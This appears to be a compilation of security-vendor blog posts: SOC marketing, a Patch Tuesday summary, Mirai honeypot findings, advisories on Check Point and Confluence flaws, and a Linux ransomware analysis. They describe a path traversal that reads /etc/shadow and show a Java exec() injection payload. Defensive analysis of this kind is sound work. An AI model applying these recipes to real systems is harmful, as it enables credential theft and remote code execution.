The Lifecycle of a Threat: The Inner Workings of the Security Operations Center

In a world where cyber criminals target businesses both large and small with ever-changing tactics and techniques, heroes emerge: Managed Service Providers (MSPs). They may not wear capes, but every day, MSPs provide crucial security and IT support to their customers. However, with new threats appearing almost daily, it can be impossible for the average MSP to keep up, especially as threat actors tend to take action well outside of normal working hours, including weekends, holidays and the middle of the night.

Having a Security Operations Center (SOC) is a crucial step for MSPs to defend their clients at all hours of the day and night, but building a SOC yourself can cost upwards of $1 million and come with many staffing and compliance headaches. For many MSPs, partnering to get a SOC is the way to go, such as partnering with SonicWall and our Managed Security Services team.

SonicWall’s SOC is defending our MSP partners and their clients day and night from shadowy cybercriminals. Here’s how they do it.

The Trifecta of the SOC: People, Process, Technology

Any effective SOC is a combination of three things: people, process and technology. While it’s easy to focus only on security tools like endpoint detection or antivirus software, it’s crucial that those tools are configured properly and that effective processes are in place to ensure the SOC is running efficiently.

That’s why the people are the most important element of the SOC: they are cyber experts who stay on top of the latest cyber threats and new techniques being used by threat actors. They also apply that knowledge and experience to the configuration of security tools. They can quickly determine which alerts are relevant and recognize patterns in the alerts that security tools throw, allowing them to spot and stop attacks at very early stages, minimizing damage for your clients. While security tools and software are important, it’s the people who bring the true value to a SOC.

Preparation is Everything

Arguably the most important part of the incident response cycle is the preparation before a cyber event takes place. Taking the time to ensure that all security tools have the latest updates, all endpoints have the correct tools installed, and that tools are using the latest security rules can make the difference between an annoying minor alert and a full security incident.

SonicWall’s SOC works with our partners to ensure that their environments are as prepared and protected as possible before a threat actor ever takes action. When new partners start out with SonicWall Managed Security Services, the SOC team conducts a white-glove onboarding process to ensure security tools are installed and configured properly. After that, the team performs configuration audits twice monthly and provides a report card to partners that includes any necessary actions needed to be optimally secure.

Minor, Major and Critical Alerts

The SonicWall Security Operations Center monitors for alerts and abnormal behavior 24 hours a day to protect our MSP partners and their clients from cyber threats. When alerts come in from security tools, a SOC analyst conducts an investigation. The SOC’s rules and technology configurations automatically classify alerts as minor, major or critical, and the SOC analyst can then upgrade or downgrade the alert as needed based on what they find in their investigation.

  • Minor Alerts are used for situations where abnormal activities have been identified in the environment, such as files being quarantined in unusual folders. There’s no evidence of anything else happening; something’s just weird. These alerts can be false positives. If further investigation or action is recommended, the SOC analyst will email you.
    If we were to think of the SOC as firefighters, in a Minor Alert, the SOC smells smoke but finds no evidence of a fire.
  • Major Alerts are used when there is confidence of malicious or suspicious activity in the environment. Often, this is activity that was stopped by security tools, such as quarantined malware, but further investigation is warranted to ensure the full threat has been addressed. In the event of a Major Alert, the SonicWall SOC will contact you by email with recommended next steps.
    To use our firefighter analogy, in Major Alerts the SOC smells smoke and the smoke detector is going off, but there is no evidence of an active fire.
  • Critical Alerts are used when there is high confidence of an active compromise happening. These alerts are when the SOC takes immediate action to mitigate the threat to keep any damage as minimal as possible, such as isolating an endpoint, pulling a server offline or deactivating a potentially compromised user account. Taking these immediate actions in response to a critical threat helps reduce attacker dwell time and keeps the attack from spreading across the network.
    In our firefighter comparison, this is the time the SOC sees active flames and works quickly to put them out to keep them from spreading and causing more damage.

When a Critical Alert happens, the SonicWall SOC team will call you on the phone every fifteen minutes for the first hour, and then every hour after that. Don’t worry – if you don’t answer, the SOC team won’t wait. The threat will still be addressed and we’ll fill you in once we’re able to connect.

Once the threat is contained, the SOC analyst will create a report that documents the incident, including what specifically happened, the scope of the incident, the actions they took to mitigate the threat, and any other areas of impact you may need to be aware of. They will also make recommendations for your next steps toward full remediation.

SonicWall’s Security Operations Center stands ready to defend all our MSP partners and their end clients, and we’ve made getting the around-the-clock protection of a SOC easier than ever. Our Managed Security Services are available with no annual contracts or long-term commitments and with no minimums. We partner with you and scale with you as your business scales – whether up or down.

Ready to get started? Contact us today to learn how you can get started with Managed Detection and Response (MDR) with a free 30-day proof of concept!

 

Microsoft Security Bulletin Coverage for June 2024

Overview

Microsoft’s June 2024 Patch Tuesday has 49 vulnerabilities, 24 of which are Elevation of Privilege. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2024 and has produced coverage for seven of the reported vulnerabilities.

Vulnerabilities with Detections

CVE CVE Title Signature
CVE-2024-30080 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability IPS 4452 Microsoft Message Queuing RCE (CVE-2024-30080)
CVE-2024-30084 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability ASPY 6802 Exploit-exe exe.MP_391
CVE-2024-30087 Win32k Elevation of Privilege Vulnerability ASPY 6805 Exploit-exe exe.MP_392
CVE-2024-30088 Windows Kernel Elevation of Privilege Vulnerability ASPY 6806  Exploit-exe exe.MP_393
CVE-2024-30089 Microsoft Streaming Service Elevation of Privilege Vulnerability ASPY 581 Exploit-exe exe.MP_390
CVE-2024-30091 Win32k Elevation of Privilege Vulnerability ASPY 580 Exploit-exe exe.MP_389
CVE-2024-35250 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability ASPY 579 Exploit-exe exe.MP_388

 

Release Breakdown

The vulnerabilities can be classified into the following categories:

For June there is one Critical, 48 Important and zero Moderate vulnerabilities.

2024 Patch Tuesday Monthly Comparison

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery and those that have been disclosed publicly before the Patch Tuesday release for each month. The above chart displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE-2024-30065 Windows Themes Denial of Service Vulnerability
CVE-2024-30070 DHCP Server Service Denial of Service Vulnerability
CVE-2024-30083 Windows Standards-Based Storage Management Service Denial of Service Vulnerability
CVE-2024-35252 Azure Storage Movement Client Library Denial of Service Vulnerability

 

Elevation of Privilege Vulnerabilities

CVE-2024-29060 Visual Studio Elevation of Privilege Vulnerability
CVE-2024-30064 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30066 Winlogon Elevation of Privilege Vulnerability
CVE-2024-30067 WinLogon Elevation of Privilege Vulnerability
CVE-2024-30068 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30076 Windows Container Manager Service Elevation of Privilege Vulnerability
CVE-2024-30082 Win32k Elevation of Privilege Vulnerability
CVE-2024-30084 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-30085 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2024-30086 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2024-30087 Win32k Elevation of Privilege Vulnerability
CVE-2024-30088 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30089 Microsoft Streaming Service Elevation of Privilege Vulnerability
CVE-2024-30090 Microsoft Streaming Service Elevation of Privilege Vulnerability
CVE-2024-30091 Win32k Elevation of Privilege Vulnerability
CVE-2024-30093 Windows Storage Elevation of Privilege Vulnerability
CVE-2024-30099 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-35248 Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability
CVE-2024-35250 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-35253 Microsoft Azure File Sync Elevation of Privilege Vulnerability
CVE-2024-35254 Azure Monitor Agent Elevation of Privilege Vulnerability
CVE-2024-35255 Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability
CVE-2024-35265 Windows Perception Service Elevation of Privilege Vulnerability
CVE-2024-37325 Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability

 

Information Disclosure Vulnerabilities

CVE-2024-30069 Windows Remote Access Connection Manager Information Disclosure Vulnerability
CVE-2024-30096 Windows Cryptographic Services Information Disclosure Vulnerability
CVE-2024-35263 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability

 

Remote Code Execution Vulnerabilities

CVE-2024-30052 Visual Studio Remote Code Execution Vulnerability
CVE-2024-30062 Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability
CVE-2024-30063 Windows Distributed File System (DFS) Remote Code Execution Vulnerability
CVE-2024-30072 Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability
CVE-2024-30074 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability
CVE-2024-30075 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability
CVE-2024-30077 Windows OLE Remote Code Execution Vulnerability
CVE-2024-30078 Windows Wi-Fi Driver Remote Code Execution Vulnerability
CVE-2024-30080 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
CVE-2024-30094 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30095 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30097 Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability
CVE-2024-30100 Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-30101 Microsoft Office Remote Code Execution Vulnerability
CVE-2024-30102 Microsoft Office Remote Code Execution Vulnerability
CVE-2024-30103 Microsoft Outlook Remote Code Execution Vulnerability

Decoding Router Vulnerabilities Exploited by Mirai: Insights from SonicWall’s Honeypot Data

As seen in Cybersecurity Insiders, June 2024.

SonicWall has already successfully defended against 5.8 million Mirai-related attacks in 2024, and we’ve seen a spike in honeypot activity related to Mirai, all aimed at exploiting vulnerabilities in aging router systems. These attacks exhibit striking similarities, a theme we will explore further in subsequent sections of this blog. By understanding the common threads among these exploits, we can better fortify our defenses against future incursions and safeguard our network infrastructure from potential compromise.  To facilitate this understanding, SonicWall is committed to continually releasing threat intelligence to ensure the industry has the most complete and updated information related to attacks on small- and medium-sized businesses (SMBs). Our research team has created five signatures across our product portfolio to ensure our customers are protected from this increasing threat.

Mirai is a significant malware threat known for targeting Internet of Things (IoT) devices, such as routers and IP cameras, to form extensive botnets. Emerging in 2016, Mirai exploits weak default credentials and vulnerabilities to compromise devices, granting attackers remote access. These compromised devices are then utilized to orchestrate large-scale Distributed Denial of Service (DDoS) attacks, posing a substantial threat to internet infrastructure worldwide.

Tracing the Path of Mirai’s Evolution

Mirai, created by Paras Jha, Josiah White and Dalton Norman, was crafted to exploit IoT device vulnerabilities for botnet recruitment. Initially, it was detected in August 2016 by MalwareMustDie researchers during a large DDoS attack on Brian Krebs’ cybersecurity site. Mirai’s source code was subsequently released by its creators in September. This release spawned numerous malware iterations, intensifying IoT security concerns. One of the most memorable breaches included the unprecedented 620 Gbps DDoS attack on KrebsOnSecurity and the October 2016 Dyn cyberattack, paralyzing internet services for major platforms like Twitter and Netflix. In 2024, SonicWall has already prevented 13.6 million attacks against IoT devices which is a 29% increase from 2023.

Mirai operates through a systematic sequence of steps: scanning for vulnerable IoT devices, exploiting weaknesses like default credentials to gain entry, infecting them to form a botnet and launching potent DDoS attacks. It spreads by continuously seeking new targets and adapts dynamically to evade detection and mitigation efforts as explained in Figure 1.

Figure 1: Mirai attack chain

Honeypot Insights

Sonicwall’s honeypots found Mirai leveraging exploits targeting old vulnerabilities in routers like Zyxel, Netgear, D-Link and TP-Link to spread Mirai. Let us examine some of the honeypot findings through the similarities in attack patterns.

1. Injection of Commands: Each attack attempts to inject and execute commands on the targeted device. These commands are typically aimed at downloading additional malicious payloads, granting unauthorized access or somehow compromising the device. For example, from a packet captured from our honeypots in Figure 2, wget, chmod and rm commands are injected.

Figure 2: Zyxel USG FLEX 100W Command Injection (CVE-2022-30525)

2. HTTP/HTTPS Requests: All attacks involve HTTP requests to interact with the device’s web interface or execute commands remotely. They manipulate URLs or parameters to exploit vulnerabilities in the target devices. For example, from a packet captured from our honeypots in Figure 3, an HTTP request is made to the device’s GetDeviceSettings endpoint to execute wget and chmod commands.

Figure 3: D-Link Devices HNAP SOAPAction-Header Command Execution CVE-2015-2051

3. Downloading and Executing Scripts: Many attacks found in our honeypots involve downloading additional scripts or binaries onto the device from a remote server and then executing the downloaded package. These scripts often contain malicious payloads aimed at compromising the device’s security or establishing unauthorized access. All of the downloaded scripts we reviewed continue to spread Mirai. For example, from a packet captured from our honeypots in Figure 4, the Mozi.m script is downloaded and executed.

Figure 4: NETGEAR DGN Devices Remote Command Execution

4. Operating System Commands: The commands being executed by Mirai are typically shell commands or scripts intended to manipulate the device’s operating system. They often involve commands like wget, chmod, rm and sh to download, modify permissions and execute scripts from a packet captured from our honeypots as you see in Figure 5.

Figure 5: TP-Link Archer AX21 Command Injection CVE-2023-1389

Who Has the Biggest Risk?

Figure 6: Mirai Hits by Industry

Not all industries are affected the same for every attack vector.  By digging into the data provided by our over 1 million sensors worldwide, we can determine which industries are the most impacted by the Mirai botnet, as you can see in Figure 6.  Real estate and rental businesses appear to be affected the most by Mirai attacks, with the data showing 86.09% of attacks focused on compromising property management systems. The finance and insurance sectors are also taking on a substantial number of attacks with around 9.65% of attacks focused on the financial sector looking to potentially expose sensitive financial data and cause disruptions to online banking services. The wholesale trade (1.88%) and professional, scientific and technical services (1.49%) sectors aren’t immune either, as they can experience supply chain disruptions and compromised networks.

Identification and Mitigation

The recent data seen by both our firewalls and honeypots underscores the urgent need to secure IoT devices to prevent their exploitation for malicious purposes. While each of the mentioned vulnerabilities affects different router products from various manufacturers, some common factors contribute to their susceptibility to exploitation by malware like Mirai. Understanding these factors can assist in preventing and detecting these types of attacks.

  1. Firmware Issues: Many of these vulnerabilities stem from weaknesses in the firmware of the routers. Firmware vulnerabilities can arise due to poor coding practices, insufficient testing or failure to address reported security issues promptly.
  2. Insecure Web Interfaces: Several vulnerabilities involve the routers’ web interfaces, which allow users to configure settings and manage the device. Weaknesses in authentication mechanisms or improper input validation can lead to remote code execution or command injection.
  3. Shell Metacharacters: Exploitation often involves the use of shell metacharacters in user-supplied input fields. These metacharacters allow attackers to manipulate command execution, enabling them to execute arbitrary commands on the router.
  4. Delayed or Lack of Patching: In many cases, vulnerabilities exploited by Mirai and similar malware have been previously disclosed, but routers remain unpatched due to delayed or absent firmware updates. This leaves devices vulnerable to exploitation even after fixes are available.
  5. Default Configurations: Default configurations, including default usernames and passwords, are often targeted by attackers. If users fail to change these default credentials, attackers can easily gain unauthorized access to the router.

To ensure SonicWall customers are prepared for any exploitation that may occur due to these vulnerabilities, the following signatures have been released which can detect and prevent these types of attacks:

  • IPS 18387 D-Link DIR-645 HNAP SOAPAction Header Command Injection
  • IPS 15761 Zyxel USG FLEX 100W Command Injection
  • IPS 13034 NETGEAR DGN Devices Remote Command Execution
  • IPS 15864 TP-Link Archer AX21 Command Injection
  • GAV Mirai

In addition to traditional signatures, Managed Service Providers (MSPs) can significantly enhance protection for small businesses against Mirai botnet attacks. They can deploy the human layer of security to identify attacker behaviors across their networks with full network visibility and proactive threat detection capabilities. By offering a multi-layered defense strategy, MSPs provide small businesses with the expertise and resources needed to defend against evolving cyber threats like the Mirai botnet.

Mirai’s “Mirai” (Future)

The data suggest that Mirai and its variants will continue to evolve, becoming more sophisticated and dangerous. These botnets are likely to incorporate new techniques specifically designed to exploit vulnerabilities in IoT devices, making them even more effective at compromising a wide range of targets. We can also expect these threats to employ advanced evasion tactics to bypass traditional security measures, making detection and mitigation more challenging. Additionally, the target surface for these attacks is expected to broaden significantly, especially as 5G continues to allow more devices with limited reviewed firmware to be network-connected. As technology advances, Mirai is likely to set its sights on emerging technologies, including smart home devices, industrial IoT systems and critical infrastructure.

Protecting against Mirai and similar threats requires a multi-faceted approach. Device manufacturers must prioritize security in their designs, ensuring robust authentication and regular updates. Users need to apply patches promptly to mitigate known vulnerabilities. Implementing network segmentation and strict access controls can limit the impact of Mirai attacks. Behavioral analysis through Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) aids in early detection, while traffic monitoring helps identify Distributed Denial of Service (DDoS) attacks. Managed Service Providers (MSPs) are invaluable in monitoring alerts and identifying these types of attacks. Collaboration through threat intelligence sharing enhances collective defense, and educating users on securing IoT devices is crucial for prevention.

Critical Path Traversal Vulnerability in Check Point Security Gateways (CVE-2024-24919)

Overview

The SonicWall Capture Labs threat research team became aware of an exploited-in-the-wild information disclosure vulnerability affecting the Check Point Security Gateways. Identified as CVE-2024-24919 and given a CVSSv3 score of 8.6, the vulnerability is more severe than it initially appears. While labeled as a sensitive information disclosure vulnerability, it is actually a path traversal attack leading to an arbitrary read, allowing an attacker to read any file on the system. A proof of concept is publicly available on GitHub. To be vulnerable, the gateway needs to have Remote Access VPN or Mobile Access Software Blades enabled. Check Point has made a patch available, and it is advisable to update immediately.

Technical Overview

The flaw is a path traversal bug in the “/clients/MyCRL” endpoint, which can be exploited via manipulated POST requests containing the string “CSHELL/” somewhere in the request. Due to the use of the “strstr” function without proper sanitizing and validation of user input, an attacker can leverage path traversal sequences like “../” within the POST request (Figure 1). This ultimately allows access to sensitive files like /etc/shadow, which contain the password hashes for the system. For our analysis, we used version R80.

 

Figure 1: Vulnerable Code

To trigger and exploit this vulnerability, an attacker must send a POST request containing the string “CSHELL/” and include a path traversal sequence like “../”. This can be done in Python, as shown in the publicly available PoC and Figure 2 below, where “path” is the file the attacker wants access to.

Figure 2: Creating a POST request to obtain sensitive information

Leveraging this code, we can demonstrate dumping the gateway’s “/etc/shadow” file to obtain the system’s hashed credentials, as seen in Figure 3. An attacker can then attempt to crack these hashes to obtain administrative access to the firewall. The attack allows access to any file on the system and is not limited. Note that this is being done against the WAN interface, showing that it is accessible over the Internet.

Figure 3: Dumping Hashed Credentials

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 4440 Check Point Security Gateway Path Traversal

Remediation Recommendations

Check Point’s gateway users are advised to apply the hotfix found in the advisory immediately.  Check Point has labeled this a mandatory patch to express the criticality of the fix.

Relevant Links

 

 

 

 

 

 

INC Ransomware Behind Linux Threat

Overview

This week, the SonicWall Capture Labs Research team analyzed a sample of Linux ransomware. The group behind this ransomware, called INC Ransomware, has been active since it was first reported a year ago.

Infection Cycle

The malware is a Linux executable in ELF file format. A quick inspection of its strings revealed command-line arguments that can be passed to this ELF file.

Figure 1: List of Command Line Arguments

Upon execution with the identified parameters, the malware appends “INC” to the names of encrypted files.

Figure 2: Debug Output Using the –debug Option

Figure 3: Encrypted files with “INC” appended file extension

The malware also creates a file named “kill,” a shell script using the esxcli utility available in VMWare ESXi to list and kill all virtual machine processes if running in an ESXi environment. Since our analysis was not conducted in such an environment, this command resulted in an error as the utility was not found.

Figure 4: Content of the “kill” and delete scripts

Another file created is “delete,” which is a shell script using the ESXi command-line utility vim-cmd to delete all available virtual machines.
Copies of ransom notes were dropped in directories where files were encrypted, consistent with other ransomware behavior.

Figure 5: Contents of “Inc_readme.html” Ransom note

The parameter ‘–motd’ also changed the message of the day (MOTD) on the infected machine to display the ransom note message upon successful login.

Figure 6: Message of the Day shows ransom note message

Visiting the URL in the ransom note led to a blog site listing all supposed victims.

Figure 7: INC Ransom blog site

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: LinuxINC.RSM(Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

For further details, visit the official man page for MOTD.

 

SonicWall Elevate 2024: Ready for the Next Level

It’s Time to Elevate

SonicWall’s current business momentum has been fueled by growth in its partner community. As part of our continued commitment to our partners, we’ve recently added Cloud Secure Edge and Managed Security Services to our lineup. And at RSA Conference this year, we unveiled SonicPlatform, which unifies all SonicWall products under a singular, integrated interface to streamline management tasks and foster deeper integration for our MSPs and MSSPs.  

At Elevate 2024, we’re excited to share an ultimate in-depth look at our recent evolution as well as show exclusive previews of SonicWall’s elevated corporate roadmap. You won’t want to miss out on Elevate 2024 and the unique opportunity to network, learn and strategize.   

What’s in Store for Elevate ’24?

SonicWall is committed to providing meaningful initiatives to its partners and it’s starting to pay dividends. Great success starts with good support — and SonicWall’s Elevate 2024 partner event is all about what we can do to support you! Join us for:  

  • Personalized meetings with SonicWall executives, thought leaders and product experts 
  • Exclusive demonstrations of our latest technological advancements, including Cloud Secure Edge 
  • A sneak peek at how our recent acquisitions can help grow and diversify your business 
  • A preview of upcoming network security solutions  
  • An interactive learning experience about minimizing alert fatigue and leveraging opportunities with SonicWall MDR’s 24×7 SOC protection 
  • Breakout sessions, workshops, and Q&A to boost your knowledge and skills 

And that’s not all. Networking events and receptions will offer a chance to network, share stories and exchange success tips with other business leaders! 

Connect With the SonicWall Team

Don’t miss the chance to interact with our executive leaders. These industry veterans are eager to engage with you and share valuable insights. Our team includes: 

  • Bob VanKirk, President, and CEO 
  • Jason Carter, Chief Revenue Officer   
  • Michael Crean, EVP of Managed Services   
  • Michelle Ragusa-McBain, VP of Global Channel   
  • Chandro Prasad, EVP Product Management and Product Marketing   
  • Christine Bartlett, Chief Marketing Officer   
  • Tarun Desikan, VP of Cloud Security   
  • Osca St. Marthe, EVP Solution Engineers, Sales & Partner Enablement   
  • Ryan Matlock, Chief Customer Success Officer   

Get Ready for an Elevated Experience!

Join us in Dallas, USA, from June 12-14, 2024, Lisbon, Portugal, from June 26-28, 2024, or Bali, Indonesia from July 10-12, 2024, by registering on our Elevate 2024 portal. You can find registration links and the agendas for each event in the table below. We look forward to seeing you there! For more information about Elevate 2024, contact us or visit the Elevate homepage.

Elevate 2024 Agendas and Registration
Registration Agenda
Dallas, USA June 12-14, 2024
Lisbon, Portugal June 26-28, 2024
Bali, Indonesia July 10-12, 2024

Confluence Data Center and Server Remote Code Execution Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of a remote code execution vulnerability in the Atlassian Confluence Data Center and Server, assessed its impact and developed mitigation measures. Confluence Server is a software to manage documentation and knowledge bases with an ubiquitous presence across the globe. Identified as CVE-2024-21683, Confluence Data Center and Server before version 8.9.1(data center only), 8.5.9 LTS and 7.19.22 LTS allows an authenticated threat actor with the privilege of adding new macro languages to execute arbitrary code, earning a high CVSS score of 8.3. Confluence users are encouraged to upgrade their instances to the latest fixed version, as mentioned by the vendor in the advisory.

Technical Overview

This vulnerability arises due to a flaw in the input validation mechanism in the ‘Add a new language’ function of the ‘Configure Code Macro’ section. This function allows users to upload a new code block macro language definition to customize the formatting and syntax highlighting. It expects the Javascript file to be formatted according to the custom brush syntax. Insufficient validation allows the authenticated attacker to inject malicious Java code embedded in a file, such as java.lang.Runtime.getRuntime().exec(”touch /tmp/poc”) , which will be executed on the server.

Triggering the Vulnerability

Leveraging the vulnerability mentioned above requires the attacker to meet the below prerequisites.

  1. The attacker must have network access to the target vulnerable system.
  2. The attacker must have the privilege to add new macro languages.
  3. The forged JavaScript language file containing malicious Java code needs to be uploaded to the Configure Code Macro > Add a new language

The following steps will walk through the process of exploitation and the measures taken to address the vulnerability in the updated version. We used Confluence versions 8.5.0 and 8.5.9 in our tests.

To begin with, the attacker uploads the language file containing malicious Java code (similar to the one mentioned above) on the page seen in Figure 1.

Figure 1: Add a new language page

The payload will be sent for evaluation to the ‘parseLanguage’ method of the ‘RhinoLanguageParser’ class, which can be found at the below location:

WEB-INF/atlassian-bundled-plugins/com.atlassian.confluence.ext.newcode-macro-plugin-5.0.1.jar!/com/atlassian/confluence/ext/code/languages/impl/RhinoLanguageParser.class

The ‘script’ variable will be formed and the ‘evaluateString’ method will process the payload, as illustrated in Figure 2.

Figure 2: Payload evaluation by RhinoLanguageParser

If we step-into the function, the ‘evaluateString’ method will further pass the control to the ‘doTopCall’ method of the ‘ScriptRuntime’ class as seen in Figure 3. So far, the behavior of both the vulnerable and fixed versions is identical.

Figure 3: Execution of the payload by ScriptRuntime class

The result of executing the ‘doTopCall’ method (shown in Figure 3) behaves differently in the vulnerable and fixed versions. The fixed version (8.5.9) throws a ‘RhinoException’ while executing ‘doTopCall’ jumps directly to line#92 and abruptly terminates the execution of the ‘evaluateString’ method of the ‘RhinoLanguageParser’ class, as seen in Figure 4. Thanks to enhanced checks, it prevents using Java references in the uploaded file and displays ‘java is not defined’ in an exception message.

Figure 4: Abruptly terminated execution in fixed version

On the other hand, the vulnerable version (8.5.0) allows the execution of the ‘doTopCall’ and hence enables the execution of the ‘evaluateString’ method of the ‘RhinoLanguageParser’ class. It also throws the ‘InvalidLanguageException’ later on, but only after executing the injected malicious Java code as seen in Figure 5.

Figure 5: Malicious code execution in a vulnerable version

Although both the vulnerable and fixed versions of the Confluence server display similar errors on the GUI, as seen in Figure 6, the damage has already been done in the vulnerable version.

Figure 6: Common error on GUI

Exploitation

The exploitation of this vulnerability yields the remote threat actor the ability to execute arbitrary code on the server. It has a high impact on the confidentiality, integrity and availability of the system and does not require user interaction.

To achieve the remote code execution, the forged JavaScript language file with crafted payload needs to be uploaded, which will form a request as seen in the top portion of Figure 7. This request will generate a file ‘/tmp/poc’ as mentioned in the payload, as seen in the bottom portion of Figure 7.

Figure 7: Malformed request(above) and RCE in vulnerable instance(below)

Additionally, the payload can be modified to yield a reverse shell as seen in Figure 8.

Figure 8: Achieving reverse shell

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 4437 Atlassian Confluence Data Center and Server RCE
  • IPS: 4438 Atlassian Confluence Data Center and Server RCE 2

Remediation Recommendations

Considering Confluence Server’s pivotal role in maintaining an organization’s knowledge base, users are strongly encouraged to upgrade their instances to the latest versions, as mentioned in the vendor advisory.

Relevant Links

Better Together: Integrating Microsoft Sentinel with SonicWall Firewalls

Getting Started

As cyber threats continue to evolve, organizations need robust security solutions to detect, respond to and prevent incidents. Microsoft Sentinel, a cloud-native Security Information and Event Management (SIEM) solution, provides intelligent security analytics and threat intelligence across the enterprise. SonicWall Next-Generation Firewalls (NGFWs), on the other hand, are a trusted network security solution that protects your network from external threats. Integrating these two products can significantly enhance your security operations.

Understanding Microsoft Sentinel and SonicWall Firewalls:

Microsoft Sentinel
Microsoft Sentinel is a scalable, cloud-native SIEM and Security Orchestration Automated Response (SOAR) solution. Uncover sophisticated threats and respond decisively with an intelligent, comprehensive security information and event management (SIEM) solution for proactive threat detection and hunting, threat investigation, and response. Microsoft Sentinel provides a consolidated way to acquire content like data connectors, workbooks, analytics and automations.

SonicWall Firewalls
SonicWall NGFWs provide the security, control and visibility to maintain an effective cybersecurity posture. SonicWall firewalls are designed to meet your specific security and usability needs, all at a cost that will protect your budget while securing your network infrastructure.

Features like stateful high availability and power supply redundancy deliver ‘always-on’ continuity, while superior UX and simpler, single-pane-of-glass management ease complexity. And with SD-WAN and DPI-SSL included, they offer an industry-leading TCO.

Features and Functionality

The integration of SonicWall NGFWs with Microsoft Sentinel can help organizations achieve a higher level of holistic visibility, security, real-time threat detection and response automation for their security infrastructure. These integration capabilities will enable our partners and customers to forward the firewall logs to the Microsoft Sentinel cloud platform, parse the logs, create custom workflows and automate the responses.

Configuration Steps

Integration can be configured in these simple steps:

1. Deploying a Microsoft Sentinel Workspace

  • Create a new resource using a custom template that builds the resources needed for Microsoft Sentinel.

2. Installing the SonicWall Solution for Microsoft Sentinel

  • Install the pre-defined “SonicWall Network Security” solution from the Microsoft Sentinel Content hub.
  • Configure the Common Event Format (CEF) via AMA data connector’s data collection rule to set the event filter types (Syslog facilities) to collect.
  • Configure the collection rules:
    • LOG_LOCAL* (0-7) to LOG_DEBUG
    • LOG_SYSLOG to LOG_DEBUG
    • LOG_USER to LOG_DEBUG

3. Installing the Operations Management Suite (OMS) or Log Analytics Agent

  • The OMS/Log Analytics Agent provides a Syslog relay. This agent should be installed on a host within the network and configure SonicOS to send ArcSight-formatted Syslog data to the agent. The Agent establishes a secure connection with Azure, so the log data is not sent to the cloud in plaintext.

4. Configuring a Syslog Server on a SonicWall Firewall

  • Configure a syslog server on your SonicWall NGFW and select Syslog Format as ArcSight (CEF) from the dropdown.
  • Specify the IP address/name of your Linux VM as the Syslog server, and Syslog Facility should be Local use 4.
    Note: Refer to this Knowledge Base Article for more information.
  • Validate that the OMS/Log Analytics Agent is receiving CEF messages and can connect to Azure.

5. Microsoft Sentinel Workbooks for SonicWall Firewalls

  • The “SonicWall Network Security” data connector includes workbooks containing a variety of queries for our various security services, as well as other traffic and security insights. You can configure the analytics rule, hunting query and workbooks as per your requirements.

Benefits of Integration

The integration of Microsoft Sentinel and SonicWall NGFWs offers several benefits for enhancing your organization’s security posture.

  • Holistic View: Microsoft Sentinel provides a bird’s-eye view across your infrastructure, reducing the stress of handling sophisticated attacks and numerous alerts.
  • Real-time Threat Detection: By ingesting SonicWall logs, you enhance your threat detection capabilities and gain visibility into network traffic, user behavior, and potential security incidents.
  • Threat Visibility and Proactive Hunting: Azure Sentinel provides intelligent security analytics, threat intelligence, and proactive hunting capabilities. It allows you to detect threats across your environment and respond promptly.
  • Automated Response: Combine Microsoft Sentinel’s SOAR capabilities with SonicWall’s real-time data to automate incident response. You can create/use playbooks to execute predefined actions based on specific events. This combination provides robust protection against evolving threats.

Availability

The SonicWall Firewalls and Microsoft Sentinel cloud platform integration is now available to all of our partners/customers.

For more detailed instructions, please refer to the SonicWall Firewall-Sentinel Integration Guide. Here is the data connector instructions article.

Better Together

Integrating the Microsoft Sentinel cloud platform with SonicWall Firewalls is a strategic move for organizations seeking comprehensive security. By leveraging the power of both platforms, you can proactively defend against threats, streamline incident responses, and stay ahead in the ever-evolving cybersecurity landscape.

Remember, security is a continuous journey, and this integration is a significant step toward a safer digital environment. Happy securing! 🔒🌐

We appreciate your continuous support, and please don’t hesitate to contact us if you have any queries or require more information. 😊

WordPress Unauthenticated Arbitrary SQL Execution Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of a noteworthy vulnerability –an SQL injection in the WordPress plugin Automatic by ValvePress – assessed its impact and developed mitigation measures for it. Around ~38k active users have installed this premium plugin. The issue allows trivial SQL injection attacks against the plugin user’s authentication process, which could allow WordPress website takeovers. The SQL vulnerability is identified as CVE-2024-27956 and was assigned a critical CVSSv3 score of 9.9.  Considering the sizeable user base, low attack complexity, and publicly available exploit code, including a simple SQL query, WordPress users are strongly encouraged to upgrade their instances to the latest or automatic plugin version above 3.92.1 with utmost priority.
